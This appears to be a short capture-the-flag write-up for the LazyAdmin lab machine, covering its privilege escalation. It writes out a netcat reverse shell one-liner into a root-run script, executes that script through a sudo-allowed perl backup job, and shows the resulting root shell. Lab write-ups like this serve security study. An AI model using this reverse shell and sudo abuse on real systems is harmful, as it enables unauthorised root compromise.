InfoSec LAB

LazyAdmin_Privilege_Escalation

Created: 1 min read

File Write

www-data@THM-Chal:/var/www$ echo 'mkfifo /tmp/zcvxgje; nc 10.9.2.95 1234 0</tmp/zcvxgje | /bin/sh >/tmp/zcvxgje 2>&1; rm /tmp/zcvxgje' > /etc/copy.sh

Overwriting the /etc/copy.sh file with a reverse shell command

www-data@THM-Chal:/var/www$ sudo -u root /usr/bin/perl /home/itguy/backup.pl

Executing the sudo-privileged command

┌──(kali㉿kali)-[~/archive/thm/lazyadmin]
└─$ nnc 1234                       
listening on [any] 1234 ...
connect to [10.9.2.95] from (UNKNOWN) [10.10.187.138] 52186
whoami
root
hostname
THM-Chal
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 9001 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 02:57:61:3f:5d:e9 brd ff:ff:ff:ff:ff:ff
    inet 10.10.187.138/16 brd 10.10.255.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 fe80::57:61ff:fe3f:5de9/64 scope link 
       valid_lft forever preferred_lft forever

System Level Compromise

Interactive Graph View

Backlinks